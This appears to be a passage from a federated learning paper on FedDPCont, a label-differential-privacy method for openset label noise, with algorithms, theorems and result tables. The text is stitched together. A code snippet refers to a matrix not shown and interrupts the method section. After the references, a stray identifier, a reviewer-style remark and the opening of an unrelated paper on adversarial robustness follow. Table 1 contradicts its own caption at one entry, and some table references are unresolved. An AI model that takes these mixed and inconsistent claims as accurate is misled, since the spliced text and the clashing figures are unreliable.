The design is related to works such as Wei et al. (2022a); Liu & Guo (2020); Cheng et al. (2020), while the key difference is the selection of the labels for the second term: our private labels are drawn from the whole (global) label space, whereas directly using the above approaches would require drawing labels locally. Intuitively, the "new" label has to be sampled globally; otherwise, the global information is missing and the negative effect of local openset label noise would induce performance degradation. Additionally, label communication in FL should be private. We defer the detailed explanation of its necessity to Appendix B.3.

4 PROPOSED METHOD

We propose the following label communication-aided algorithm FedDPCont, which we also illustrate in Figure 1. There are two critical stages to guarantee the success of the proposed method with good DP protection:

- **Stage 1**: Privacy-preserving global label communication, given in Section 4.1.
- **Stage 2**: Contrastive gradient updates at the local client using $\ell_{PL}$, given in Section 4.2, with the shared label information from Stage 1.
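The failure can be checked numerically; below is a small self-contained sketch using the example $T_{\text{OptEst}}$ above, showing that the "corrected" loss of a clean class-2 instance is lower when all probability mass is placed on class 3 than on the true class.

```python
import numpy as np

# Optimal estimate of T under the openset label space {1, 2} (0-indexed classes).
T_opt_est = np.array([[1.0, 0.0, 0.0],
                      [1/3, 2/3, 0.0],
                      [1/4, 3/4, 0.0]])

def corrected_ce(f, y):
    """Forward loss correction: -log((T^T f)[y])."""
    return -np.log((T_opt_est.T @ f)[y])

f_true = np.array([0.0, 1.0, 0.0])  # all mass on the clean class 2
f_bad = np.array([0.0, 0.0, 1.0])   # all mass on class 3

print(corrected_ce(f_true, 1))  # -ln(2/3) ~= 0.405
print(corrected_ce(f_bad, 1))   # -ln(3/4) ~= 0.288, i.e., class 3 is preferred
```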
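Before detailing the two stages, the following is a minimal PyTorch sketch of the contrastive loss $\ell_{PL}$ used in Stage 2; `private_label_dist` stands for the globally shared label distribution that Stage 1 (Section 4.1) makes available to every client, and all names are illustrative.

```python
import torch
import torch.nn.functional as F

def pl_loss(logits, noisy_labels, private_label_dist):
    """l_PL = CE(f(x), noisy label) - CE(f(x), y'), with y' sampled from the
    globally shared label distribution recovered in Stage 1."""
    batch = logits.size(0)
    probs = private_label_dist.repeat(batch, 1)        # one row per example
    y_prime = torch.multinomial(probs, 1).squeeze(1)   # contrastive labels y'
    pos = F.cross_entropy(logits, noisy_labels)
    neg = F.cross_entropy(logits, y_prime)
    return pos - neg   # the second term penalizes blind memorization
```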
4.1 LABEL COMMUNICATION

Label privacy protection is an essential feature of FL, so we cannot pass $\tilde{Y}$ to the other clients directly. To protect privacy, we adopt label differential privacy (DP) as in Definition 2.

**Definition 2** (Label Differential Privacy (Ghazi et al., 2021)). Let $\epsilon > 0$. A randomized algorithm $A$ is said to be $\epsilon$-label differentially private ($\epsilon$-labelDP) if for any two training datasets $D$ and $D'$ that differ in the label of a single example, and for any subset $S$ of outputs of $A$,

$$\mathbb{P}(A(D) \in S) \leq e^{\epsilon} \cdot \mathbb{P}(A(D') \in S).$$

The high-level idea for achieving label DP is that each client $c$ uses a symmetric noise transition matrix $T_{DP}$ to flip its local labels:

$$T_{DP}[y, \bar{y}] := \mathbb{P}(\bar{Y} = \bar{y} \mid Y = y) = \begin{cases} \frac{e^{\epsilon}}{e^{\epsilon} + K - 1}, & \text{if } \bar{y} = y, \\ \frac{1}{e^{\epsilon} + K - 1}, & \text{if } \bar{y} \neq y, \end{cases}$$

where $K$ is the number of classes. Then only the flipped labels are shared between the clients and the server. It is easy to show that sharing the flipped labels using $T_{DP}$ suffices to preserve labelDP:

**Theorem 1** (Label Privacy in FedDPCont). Label sharing in FedDPCont is $\epsilon$-labelDP.

Denote by $p_n^c$ the one-hot encoding of the noisy label $\tilde{y}_n^c$. The whole label communication process is presented in Algorithm 1. At the beginning of the algorithm, the server initializes $T_{DP}$ according to $\epsilon$ and broadcasts $T_{DP}$ to all $C$ clients. Each client $c$ calculates the DP label distribution of every data point $(x_n^c, \tilde{y}_n^c)$ as $\bar{p}_n^c = T_{DP}^\top p_n^c$. From this distribution, the client generates the DP private label $\bar{y}_n^c$, $n \in [N_c]$, for every data point, and every client sends all $\bar{y}_n^c$ back to the server. After obtaining all $\bar{y}_n^c$ from the clients, the server aggregates the labels into the posterior label distribution $\bar{p}$. To restore the distribution of $\tilde{Y}$, the server calculates $(T_{DP}^\top)^{-1}\bar{p}$; this works because, in expectation, the aggregated DP-label distribution satisfies $\bar{p} = T_{DP}^\top \tilde{p}$, where $\tilde{p}$ is the global noisy-label distribution, so that

$$(T_{DP}^\top)^{-1}\bar{p} = (T_{DP}^\top)^{-1} T_{DP}^\top \tilde{p} = \tilde{p}.$$

By applying $T_{DP}$ and $(T_{DP}^\top)^{-1}$ sequentially, FedDPCont enables the clients to share label information with the others while DP is guaranteed. Finally, each client calculates its local loss according to $\ell_{PL}$, where the contrastive label is sampled from $\mathbb{P}(\tilde{Y} = i) := ((T_{DP}^\top)^{-1}\bar{p})[i]$. This label communication procedure guarantees $\epsilon$-DP.

4.2 FedDPCont

Based on the recovered distribution $\mathbb{P}(\tilde{Y} \mid \tilde{D})$, we propose FedDPCont, a novel framework based on FedAvg, to solve the local openset noise problem. Denote by $\Delta_c^{(r)} := \theta_c^{r+1} - \theta_c^r$ the variation of model parameters in the $r$-th round of local training at client $c$; recall $\theta_c$ are the parameters of $f_c$. Denote by $\Delta^{(r)} := \theta^{r+1} - \theta^r$ the variation of model parameters in the $r$-th round of the corresponding global gradient descent update, assuming the local data were collected at a central server. Define $\mathbb{P}(D_c | D) := \mathbb{P}((X, Y) \sim \mathcal{D}_c \mid (X, Y) \sim \mathcal{D})$; numerically, it is calculated as $N_c / N$ for client $c$ given $D$. We have the following theorem for the calibration property of FedDPCont.
**Algorithm 1** Label Communication in FedDPCont

1: **Initialization:** The server initializes $T_{DP}$ according to $\epsilon$ and broadcasts $T_{DP}$ to all clients.
2: **for** $c$ in $C$ clients **do**
3: &nbsp;&nbsp;calculate $\bar{p}_n^c = T_{DP}^\top p_n^c$, $\forall n \in [N_c]$, where $p_n^c$ is the one-hot encoding of $\tilde{y}_n^c$.
4: &nbsp;&nbsp;generate the DP private label $\bar{y}_n^c$ using $\mathbb{P}(\bar{y}_n^c = i) = \bar{p}_n^c[i]$, $\forall i \in [K], n \in [N_c]$.
5: &nbsp;&nbsp;send $\{\bar{y}_n^c\}_{n \in [N_c]}$ to the server
6: **end for**
7: The server aggregates the labels $\{\bar{y}_n^c\}_{n \in [N_c]}$ sent from all $C$ clients.
8: The server calculates the posterior label distribution $\bar{p}$: $\bar{p}[i] := \frac{1}{N} \sum_{c=1}^{C} \sum_{n=1}^{N_c} \mathbb{1}(\bar{y}_n^c = i)$.
9: The server calculates $(T_{DP}^\top)^{-1}\bar{p}$ and sends it to each client $c$.
10: Client $c$ samples the contrastive label $\tilde{y}_n'$ in $\ell_{PL}$ following $\mathbb{P}(\tilde{Y} = i) = ((T_{DP}^\top)^{-1}\bar{p})[i]$.

Figure 1: The illustration of FedDPCont. **Step 1** is the $T_{DP}$ generation, where the server generates $T_{DP}$ according to $\epsilon$ and sends it to each client. **Step 2** is the label communication: every client $c$ computes its DP labels $\bar{Y}_c$ from its noisy labels $\tilde{Y}_c$ according to $T_{DP}$ and sends $\bar{Y}_c$ to the server; the server aggregates all $\bar{Y}_c$, calculates the posterior label distribution $\bar{p}$, and sends $(T_{DP}^\top)^{-1}\bar{p}$ to every client for contrastive-term sampling. **Step 3** is the loss calculation on every client $c$, using the noisy labels $\tilde{Y}_c$, the model predictions $\hat{Y}_c$, and $Y_c'$ sampled from $(T_{DP}^\top)^{-1}\bar{p}$. **Step 4** is the back-propagation for contrastive gradient updates.

**Theorem 2** (Local clients with FedAvg). The aggregated model update of FedDPCont is the same as the corresponding centralized model update, i.e.,

$$\sum_{c \in [C]} \mathbb{P}(D_c | D) \cdot \Delta_c^{(r)} = \Delta^{(r)}.$$

Theorem 2 shows that the extra effect of local openset label noise can be mitigated by sharing private labels and FedAvg. Note the theorem only covers the expectation level (infinite data size), meaning the gap between distributed learning and centralized learning given limited data still exists. Given Theorem 2, we can further show that $\ell_{PL}$ is robust to label noise, as has been done for centralized training (Liu & Guo, 2020).
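A minimal NumPy sketch of the label communication mechanism of Algorithm 1 is given below; the clipping/renormalization at the end is a practical addition (the finite-sample estimate $(T_{DP}^\top)^{-1}\bar{p}$ can leave the probability simplex), and all names are illustrative.

```python
import numpy as np

def make_t_dp(eps, K):
    """Symmetric randomized-response matrix: keep a label w.p. e^eps/(e^eps+K-1)."""
    T = np.full((K, K), 1.0 / (np.exp(eps) + K - 1))
    np.fill_diagonal(T, np.exp(eps) / (np.exp(eps) + K - 1))
    return T

def client_flip(noisy_labels, T_dp, rng):
    """Each client privatizes its noisy labels before sending them (lines 2-6)."""
    K = T_dp.shape[0]
    return np.array([rng.choice(K, p=T_dp[y]) for y in noisy_labels])

def server_recover(dp_labels, T_dp):
    """Aggregate the DP labels and invert T_DP^T (lines 7-9)."""
    K = T_dp.shape[0]
    p_bar = np.bincount(dp_labels, minlength=K) / len(dp_labels)
    p_hat = np.linalg.inv(T_dp.T) @ p_bar
    p_hat = np.clip(p_hat, 0.0, None)   # practical fix: project the estimate
    return p_hat / p_hat.sum()          # back onto the probability simplex
```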
**Algorithm 2** FedDPCont

1: **Server:** initialize model $f_g$, global step size $\alpha_g$, and global communication rounds $R$.
2: **Each Client** $c$: initialize model $f_c$, the dataset $D_c = \{(x_n^c, y_n^c)\}_{n \in [N_c]}$, local learning rate $\alpha_c$, and local updating iterations $E$.
3: The server generates and broadcasts $T_{DP}$ to all clients according to Definition 2.
4: Clients generate DP labels $\bar{y}_n^c$ and send them to the server according to Section 4.1.
5: The server aggregates $\bar{y}_n^c$ and calculates the posterior label distribution $\bar{p}$.
6: The server sends $(T_{DP}^\top)^{-1}\bar{p}$ to each client.
7: **for** $i = 1 \rightarrow R$ **do**
8: &nbsp;&nbsp;Randomly select $C'$ clients from $C$ according to $\lambda$
9: &nbsp;&nbsp;**for** $c$ in $C'$ clients **do**
10: &nbsp;&nbsp;&nbsp;&nbsp;$f_c \leftarrow f$
11: &nbsp;&nbsp;&nbsp;&nbsp;**for** $j = 1 \rightarrow E$ **do**
12: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\hat{y}_n^c \leftarrow f_c(x_n^c), \forall n \in [N_c]$
13: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sample $(y_n^c)'$ following $(T_{DP}^\top)^{-1}\bar{p}, \forall n \in [N_c]$.
14: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$L_c \leftarrow \frac{1}{N_c} \sum_{n=1}^{N_c} \left(\ell(\hat{y}_n^c, \tilde{y}_n^c) - \ell(\hat{y}_n^c, (y_n^c)')\right)$
15: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$f_c \leftarrow f_c - \alpha_c \cdot \nabla L_c$
16: &nbsp;&nbsp;&nbsp;&nbsp;**end for**
17: &nbsp;&nbsp;**end for**
18: &nbsp;&nbsp;$f \leftarrow f + \alpha_g \cdot \sum_{c=1}^{C'} (f_c - f)$
19: **end for**

The details of FedDPCont are shown in Algorithm 2. At the beginning of FedDPCont, the server and the clients initialize their models, and each client $c$ initializes its own dataset $D_c$ and the loss function $\ell$. The server then generates the DP matrix $T_{DP}$ and sends it to every client, so that every client $c$ can generate its DP labels $\bar{y}_n^c$. Next, every client $c$ sends $\bar{y}_n^c$ to the server, and the server aggregates the DP labels according to Section 4.1. After aggregation at the server, the posterior label distribution $\bar{p}$ can be computed, and the server sends $(T_{DP}^\top)^{-1}\bar{p}$ back to the clients so that each client can sample its private labels from this distribution. To simulate practical usage, only a subset of the clients, rather than all of them, participates in each training round; the clients are chosen randomly according to the federated fraction $\lambda$. The selected clients sample the "contrastive labels" $Y_c'$ from the distribution $(T_{DP}^\top)^{-1}\bar{p}$ and calculate the loss $L_c$ according to $\ell_{PL}$, using the output of the model $\hat{Y}_c$. The model weights are updated with $L_c$, and the server weights are averaged according to FedAvg (McMahan et al., 2017), which concludes one communication round.

**Privacy Issue.** We are aware that the label distribution recovered by our algorithm may also raise privacy concerns. However, the existing attacks in federated learning mainly exploit embedding layers (Melis et al., 2019), fully-connected layers (Zhao et al., 2020; Geiping et al., 2020; Pan et al., 2020), and model gradients (Aono et al., 2017; Melis et al., 2019). Different from the leakage of individual labels, the label distribution recovered by our algorithm carries much less information; to the best of our knowledge, there is no direct evidence of harm from leaking an imperfect label distribution. In Table 3, we illustrate that different DP privacy levels ($\epsilon$) correspond to different performance, indicating that, even though we restore the distribution of $\tilde{Y}$ (Algorithm 1, Line 9), it is still different from the original one.

5 EXPERIMENTS AND RESULTS

5.1 Experiments Setup

To validate the generality and effectiveness of FedDPCont, we select several public datasets of varying difficulty, including CIFAR-10 and CIFAR-100 (Krizhevsky et al., 2009) as benchmark datasets and CIFAR-N (Wei et al., 2022b) and Clothing-1M (Xiao et al., 2015) as real-world datasets. To simulate practical usage, we first apply the noise to the labels and then generate the openset candidates according to the number of classes $K$ for every client, because only the noisy labels are visible to the clients in the real world. On CIFAR-10 and CIFAR-100, we apply symmetric noise for benchmark testing and random noise for practical simulation. Furthermore, we also evaluate on Clothing-1M and CIFAR-N to test the performance of FedDPCont in real-world scenarios. As baseline methods, we use FedAvg (McMahan et al., 2017), forward loss correction (LC) (Patrini et al., 2017), FedProx (Li et al., 2020b), Co-teaching (Han et al., 2018), T-revision (Xia et al., 2019), FedBN (Li et al., 2021), FedDyn (Acar et al., 2021), and Scaffold (Karimireddy et al., 2020).
Table 1: The performance (the best accuracy) of all methods on CIFAR-10 and CIFAR-100. FedDPCont is always the best method.

| Dataset | Method | Symmetric 0.2 | Symmetric 0.4 | Symmetric 0.6 | Symmetric 0.8 | Random 0.2 | Random 0.4 | Random 0.6 | Random 0.8 |
|---------|--------|---------------|---------------|---------------|---------------|------------|------------|------------|------------|
| CIFAR-10 | FedAvg | 76.84±0.91 | 63.34±1.82 | 43.83±0.51 | 22.13±1.25 | 76.24±1.48 | 59.19±1.09 | 46.80±2.63 | 21.80±0.28 |
| | LC | 79.14±0.38 | 63.57±0.61 | 44.33±1.13 | 22.98±1.60 | 74.96±1.92 | 61.49±3.02 | 40.52±2.18 | 23.84±3.37 |
| | FedProx | 70.54±0.57 | 59.35±0.65 | 45.61±0.97 | 22.70±1.10 | 68.51±0.92 | 58.61±0.38 | 43.97±1.06 | 24.64±2.59 |
| | Co-teaching | 78.64±0.45 | 70.60±0.47 | 48.63±0.57 | 21.06±2.10 | 75.11±0.39 | 59.00±1.19 | 31.30±2.03 | 17.10±3.78 |
| | T-revision | 69.16±0.20 | 51.86±6.64 | 42.93±2.56 | 15.27±1.14 | 64.69±1.08 | 46.22±1.08 | 31.80±0.83 | 17.12±0.73 |
| | FedDyn | 67.97±0.97 | 53.97±0.14 | 42.30±1.66 | 19.76±1.66 | 63.03±0.62 | 43.06±2.42 | 11.11±2.83 | 10.22±2.98 |
| | FedBN | 67.82±0.91 | 53.49±0.85 | 39.33±2.52 | 19.50±0.99 | 66.66±4.69 | 58.20±1.58 | 41.38±1.89 | 22.66±2.03 |
| | Scaffold | 64.02±0.13 | 55.50±0.96 | 37.48±2.16 | 15.10±0.43 | 59.13±0.83 | 50.36±1.54 | 34.73±4.12 | 18.23±1.66 |
| | FedDPCont | 44.77±0.12 | 75.75±1.96 | 55.50±1.35 | 24.64±0.55 | 82.15±0.24 | 72.69±1.57 | 59.06±1.38 | 27.55±1.49 |
| CIFAR-100 | FedAvg | 47.78±0.50 | 32.63±0.27 | 20.32±0.51 | 10.62±0.26 | 47.75±0.29 | 31.06±0.79 | 20.14±0.32 | 9.71±0.43 |
| | LC | 47.91±0.28 | 32.68±0.28 | 20.32±0.51 | 10.62±0.26 | 47.75±0.29 | 31.06±0.79 | 20.14±0.32 | 9.71±0.43 |
| | FedProx | 42.14±0.27 | 24.68±0.11 | 16.52±0.77 | 8.85±0.60 | 40.77±0.30 | 25.03±0.47 | 17.16±0.64 | 8.84±0.56 |
| | Co-teaching | 41.15±0.28 | 29.81±0.72 | 18.01±0.28 | 8.73±1.08 | 40.55±1.79 | 28.51±1.41 | 18.47±1.95 | 6.56±1.38 |
| | T-revision | 48.21±0.56 | 31.35±0.46 | 17.41±0.22 | 7.79±0.28 | 48.24±0.47 | 30.91±0.55 | 16.95±0.78 | 7.46±0.20 |
| | FedDyn | 31.73±0.79 | 23.35±0.23 | 15.53±0.22 | 7.82±0.35 | 32.22±0.35 | 23.83±0.42 | 16.23±0.59 | 7.86±0.10 |
| | FedBN | 31.56±0.19 | 24.85±0.18 | 14.42±0.93 | 7.10±0.32 | 30.56±0.36 | 22.52±0.47 | 15.07±0.77 | 7.10±0.36 |
| | Scaffold | 31.56±0.20 | 24.85±0.38 | 14.42±0.93 | 7.10±0.35 | 28.49±0.75 | 21.74±0.48 | 11.19±1.23 | 1.97±0.44 |
| | FedDPCont | 53.39±0.43 | 34.99±1.66 | 21.35±0.69 | 11.02±0.66 | 51.73±0.36 | 34.43±0.72 | 21.35±0.72 | 10.64±0.43 |

We are aware that there are other noisy-learning methods that achieve impressive performance, e.g., DivideMix (Li et al., 2020a). However, their underlying semi-supervised learning mechanisms and mix-up data augmentation (Zhang et al., 2018) introduce massive training cost and are out of the scope of this paper. We leave discussions of the computation cost and performance comparisons with such methods to Appendix D.1.

The local updating iteration $E$ is 5 and the federated fraction $\lambda$ is 0.1. The network architecture is ResNet-18 (He et al., 2016) for the CIFAR datasets and ResNet-50 (He et al., 2016) with ImageNet (Deng et al., 2009) pre-trained weights for Clothing-1M. The local learning rate $\alpha_c$ is 0.01 and the batch size is 32. The total number of communication rounds $R$ is 300, and the differential privacy levels $\epsilon$ are 3.58, 5.98, and 3.95 for CIFAR-10, CIFAR-100, and Clothing-1M, respectively, keeping the total label-flipping probability $(K - 1)/(e^{\epsilon} + K - 1) \leq 0.2$ in Section 4.1.
All the experiments are run three times with different random seeds to validate the generality of our method. The implementation details of every baseline method in the FL setting can be found in the Appendix.

5.2 Synthetic Open-Set Label Noise

There are two strategies (a code sketch of both noise models follows Table 2 below):

- **Symmetric**: We first add symmetric label noise (Xia et al., 2019; Han et al., 2018) to dataset $D$ to get $\tilde{D}$, then distribute $\tilde{D}$ to $\tilde{D}_c$, $\forall c$, following the uniform allocation in Section 3.1. The transition matrix $T$ for symmetric label noise satisfies $T_{ij} = \eta/(K - 1), \forall i \neq j$, and $T_{ii} = 1 - \eta, \forall i \in [K]$, where $\eta \in \{0.2, 0.4, 0.6, 0.8\}$ is the average noise rate.
- **Random**: We first add random label noise (Zhu et al., 2022) to dataset $D$ to get $\tilde{D}$, then distribute $\tilde{D}$ to $\tilde{D}_c$, $\forall c$, following the non-uniform allocation in Section 3.1. The $T$ of random noise is generated as follows: the diagonal elements are generated by $\eta + \text{Unif}(-0.05, 0.05)$, where $\eta$ is the average noise rate and $\text{Unif}(-0.05, 0.05)$ is the uniform distribution bounded by $-0.05$ and $0.05$; the off-diagonal elements in each row follow the Dirichlet distribution $(1 - T_{ii}) \cdot \text{Dir}(\mathbf{1})$, where $\mathbf{1} = [1, \cdots, 1]$ ($K - 1$ values). The random strategy is more practical than the symmetric one.

**Results and Discussion** Table 1 shows FedDPCont is significantly better than all the baseline methods under the symmetric strategy across almost all noise rate settings. It is also better than the other methods in most settings of the random strategy and is always in the top two; FedDPCont is very competitive in all settings. Table 1 also shows that directly applying methods designed for centralized learning with noisy labels is not statistically better than the traditional federated learning solution (FedAvg) and its adapted version (FedProx), indicating that openset label noise in FL is indeed challenging and special treatment is necessary to generalize centralized solutions to the FL setting. We also report the accuracy of the last epoch in Table ?? and ?? in the Appendix; FedDPCont also stands out in most cases, showing its stability.

Table 2: The performance (the best accuracy) of all methods on CIFAR-N and Clothing-1M.

| Methods | CIFAR-10N Worst | CIFAR-10N Random | CIFAR-10N Aggregate | CIFAR-100N Fine | Clothing-1M (1M noisy training) |
|-------------|-------------------|-------------------|-------------------|-------------|-------------|
| FedAvg | 46.55±7.82 | 59.69±4.88 | 66.41±6.52 | 22.65±2.29 | 70.27 |
| LC | 46.67±8.21 | 59.27±5.72 | 67.27±4.76 | 22.59±1.66 | 70.05 |
| FedProx | 58.47±0.97 | 69.35±0.62 | 74.48±1.00 | 35.33±0.35 | 65.96 |
| Co-teaching | 24.80±2.27 | 47.34±21.05 | 62.04±11.26 | 17.83±0.39 | 40.33 |
| T-revision | 57.85±19.44 | 55.06±8.40 | 63.40±9.99 | 22.18±1.44 | 66.95 |
| FedBN | 63.07±3.29 | 73.02±1.45 | 77.55±2.16 | 37.59±0.61 | - |
| FedDPCont | **63.50±5.63** | **73.68±4.35** | **81.86±1.09** | **40.60±1.91** | **70.88** |
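As referenced above, here is a minimal sketch of the two synthetic noise models of Section 5.2; it follows the description there literally (in particular, the diagonal of the random $T$ is drawn as written), and the helper names are illustrative.

```python
import numpy as np

def symmetric_T(K, eta):
    """T_ii = 1 - eta; the off-diagonal mass eta is spread uniformly."""
    T = np.full((K, K), eta / (K - 1))
    np.fill_diagonal(T, 1.0 - eta)
    return T

def random_T(K, eta, rng):
    """Diagonal from eta + Unif(-0.05, 0.05), as described above; the remaining
    row mass (1 - T_ii) is split by a flat Dirichlet over the other classes."""
    T = np.zeros((K, K))
    for i in range(K):
        T[i, i] = np.clip(eta + rng.uniform(-0.05, 0.05), 0.0, 1.0)
        T[i, np.arange(K) != i] = (1.0 - T[i, i]) * rng.dirichlet(np.ones(K - 1))
    return T

def flip_labels(y, T, rng):
    """Apply T row-wise: sample a noisy label for each clean label."""
    return np.array([rng.choice(T.shape[0], p=T[yi]) for yi in y])
```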
Table 3: The influence of different $\epsilon$ on the performance.

| $\epsilon$ | 1 | 2 | 4 | 8 | 100 | 3.58 |
|------------|----|----|----|----|-----|------|
| Accuracy | 72.47±2.64 | 71.60±1.96 | 72.27±1.87 | 73.00±1.96 | 73.75±2.38 | 72.44±1.52 |

5.3 Real-World Label Noise

We also test the performance on two real-world datasets: CIFAR-N (Wei et al., 2022b) and Clothing-1M (Xiao et al., 2015). Different from the benchmark datasets, these datasets are corrupted naturally. Clothing-1M is collected from a real website, where both the data and the labels come from real users; its noise ratio is about 0.4. CIFAR-N consists of CIFAR-10N and CIFAR-100N, with $D_c$ generated according to the random setting given in Section 5.2. The labels of CIFAR-N are collected from human annotation. There are three noise levels in CIFAR-10N (worst, aggregate, and random), while CIFAR-100N has only one. FedDPCont outperforms all the baseline methods on the real-world datasets, showing great potential for practical usage.

5.4 Effect of DP Level

According to Sections 4.1 and 4.2, label communication and contrastive gradient updates at local clients are the two key steps of FedDPCont, and $\epsilon$ is the parameter that controls the level of DP protection. Following Ghazi et al. (2021), we study the influence of $\epsilon$ on the performance. We select CIFAR-10 corrupted by random noise with ratio 0.4, and run all experiments with 10 random seeds. Despite the randomness of model initialization and noise generation, FedDPCont is stable across different values of $\epsilon$, which agrees with our theoretical guarantee.

6 Conclusion

We have defined openset label noise in FL and proposed FedDPCont, which uses globally communicated contrastive labels to prevent local models from memorizing openset noise patterns. We have proved that FedDPCont approximates a centralized solution with strong theoretical guarantees, and our experiments verified its advantage. Admittedly, FedDPCont is only tested under different label noise regimes with synthetic data partitions. Future work includes testing FedDPCont with real-world FL data partitions and real-world clients such as mobile devices.

REFERENCES

Durmus Alp Emre Acar, Yue Zhao, Ramon Matas Navarro, Matthew Mattina, Paul N Whatmough, and Venkatesh Saligrama. Federated learning based on dynamic regularization. *arXiv preprint arXiv:2111.04263*, 2021.

Vibhu Agarwal, Tanya Podchiyska, Juan M Banda, Veena Goel, Tiffany I Leung, Evan P Minty, Timothy E Sweeney, Elsie Gyang, and Nigam H Shah. Learning statistical models of phenotypes using noisy labeled training data. *Journal of the American Medical Informatics Association*, 23(6):1166–1173, 2016.

Mathieu Andreux, Jean Ogier du Terrail, Constance Beguier, and Eric W Tramel. Siloed federated learning for multi-centric histopathology datasets. In *Domain Adaptation and Representation Transfer, and Distributed and Collaborative Learning*, pp. 129–139. Springer, 2020.

Yoshinori Aono, Takuya Hayashi, Lihua Wang, Shiho Moriai, et al. Privacy-preserving deep learning via additively homomorphic encryption. *IEEE Transactions on Information Forensics and Security*, 13(5):1333–1345, 2017.

HeeSun Bae, Seungjae Shin, Byeonghu Na, JoonHo Jang, Kyungwoo Song, and Il-Chul Moon. From noisy prediction to true label: Noisy prediction calibration via generative model.
In *International Conference on Machine Learning*, pp. 1277–1297. PMLR, 2022.

Hao Cheng, Zhaowei Zhu, Xingyu Li, Yifei Gong, Xing Sun, and Yang Liu. Learning with instance-dependent label noise: A sample sieve approach. *arXiv preprint arXiv:2010.02347*, 2020.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. IEEE, 2009.

Lei Feng, Senlin Shu, Zhuoyi Lin, Fengmao Lv, Li Li, and Bo An. Can cross entropy loss be robust to label noise? In *Proceedings of the Twenty-Ninth International Conference on International Joint Conferences on Artificial Intelligence*, pp. 2206–2212, 2021.

Jonas Geiping, Hartmut Bauermeister, Hannah Dröge, and Michael Moeller. Inverting gradients—how easy is it to break privacy in federated learning? *Advances in Neural Information Processing Systems*, 33:16937–16947, 2020.

Badih Ghazi, Noah Golowich, Ravi Kumar, Pasin Manurangsi, and Chiyuan Zhang. Deep learning with label differential privacy. *Advances in Neural Information Processing Systems*, 34:27131–27145, 2021.

Aritra Ghosh, Himanshu Kumar, and P Shanti Sastry. Robust loss functions under label noise for deep neural networks. In *Proceedings of the AAAI conference on artificial intelligence*, volume 31, 2017.

Bo Han, Quanming Yao, Xingrui Yu, Gang Niu, Miao Xu, Weihua Hu, Ivor Tsang, and Masashi Sugiyama. Co-teaching: Robust training of deep neural networks with extremely noisy labels. *Advances in neural information processing systems*, 31, 2018.

Bo Han, Quanming Yao, Tongliang Liu, Gang Niu, Ivor W Tsang, James T Kwok, and Masashi Sugiyama. A survey of label-noise representation learning: Past, present and future. *arXiv preprint arXiv:2011.04406*, 2020.

Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 770–778, 2016.

Zhimeng Jiang, Kaixiong Zhou, Zirui Liu, Li Li, Rui Chen, Soo-Hyun Choi, and Xia Hu. An information fusion approach to learning with instance-dependent label noise. In *International Conference on Learning Representations*, 2022. URL https://openreview.net/forum?id=ecH2FKaARUp.
KncRpAnprQ
A simple test to verify the obfuscating gradient behaviour is to measure whether the perturbation, found based on the attack methods in the paper, indeed reaches the specified radius of the $\ell_p$ ball.
A NOVEL APPROACH FOR ADVERSARIAL ROBUSTNESS

Anonymous authors
Paper under double-blind review

ABSTRACT

Deep learning has made tremendous progress in the last decades; however, it is not robust to adversarial attacks. Perhaps the most effective remedy is adversarial training, which, besides its high computational cost, is impractical because it needs prior knowledge about the attacker. In this paper, we propose a novel approach that can train a robust network through standard training with clean images alone, without awareness of the attacker's strategy. Essentially, we add a specially designed network input layer, which accomplishes a randomized feature squeezing that greatly reduces the effect of malicious perturbations. Measured in terms of the attacker's versus the defender's computational cost, it achieves state-of-the-art robustness against unseen $l_1$-, $l_2$-, and $l_\infty$-attacks simultaneously, through just 100/50 epochs of standard training with clean images on CIFAR-10/ImageNet.

1 INTRODUCTION

The vulnerability of neural networks has been widely acknowledged by the deep learning community since the seminal work of Szegedy et al. (2014). Many solutions have been proposed to address this problem; they can be categorized into three classes.

The first is preprocessing-based approaches, which include bit-depth reduction (Xu et al., 2018), JPEG compression, total variance minimization, image quilting (Guo et al., 2018), and Defense-GAN (Samangouei et al., 2018). With this kind of preprocessing, the hope is that the adversarial effect can be reduced. However, it neglects the fact that the adversary can still take this operation into account and craft an effective attack through Backward Pass Differentiable Approximation (BPDA) (Athalye et al., 2018).

Secondly, perhaps the most effective method is adversarial training. The idea is straightforward: in the training phase, the attack is mimicked through backward gradient propagation with respect to the current network state. A large volume of work falls into this class, differing in how the extra training samples are generated. Madry et al. (2018) used a classical 7-step PGD attack, while other approaches are also possible, such as Mixup inference (Pang et al., 2020), feature scattering (Zhang & Wang, 2019), feature denoising (Xie et al., 2019), geometry-aware instance reweighting (Zhang et al., 2021), and channel-wise activation suppressing (Bai et al., 2021). External (Gowal et al., 2020) or generated data (Gowal et al., 2021; Rebuffi et al., 2021) are also beneficial for robustness, on top of which parameterizing activation functions (Dai et al., 2022) brings further improvement. A theoretically principled trade-off between robustness and accuracy is analyzed in Zhang et al. (2019), which is somewhat reconciled by a self-consistent robust error (Pang et al., 2022) or by reducing excess margin along certain adversarial directions (Rade & Moosavi-Dezfooli, 2022). Pre-training is also helpful (Hendrycks et al., 2019). Recently, Jin et al. (2022) proposed to enhance adversarial training with second-order statistics of weights. The inherent drawback is the large computational cost, and therefore the practical significance is somewhat diminished. It should be noted that there do exist some free or fast adversarial training schemes, as in Shafahi et al. (2019); Wong et al. (2020), or an improved subspace variant (Li et al., 2022), but they come with some degradation in performance.
Another big issue is that adversarial training needs some prior knowledge about the attacks; otherwise, a simulation of the attack cannot be conducted. This is certainly unrealistic in practice. Usually, such methods train with just one particular $l_p$-attack, with the exception of Laidlaw et al. (2021), which uses Perceptual Adversarial Training against multiple attacks. There is also the possibility of robust overfitting (Rice et al., 2020).

The last class is adaptive test-time defenses. They try to purify the input in an iterative way, as in Mao et al. (2021); Shi et al. (2021); Yoon et al. (2021), or adapt the model parameters or even the network structure to reverse the attack effect. For example, closed-loop control is adopted in Chen et al. (2021), and a neural Ordinary Differential Equation (ODE) layer is applied in Kang et al. (2021). Unfortunately, most of them are shown to be ineffective in Croce et al. (2022).

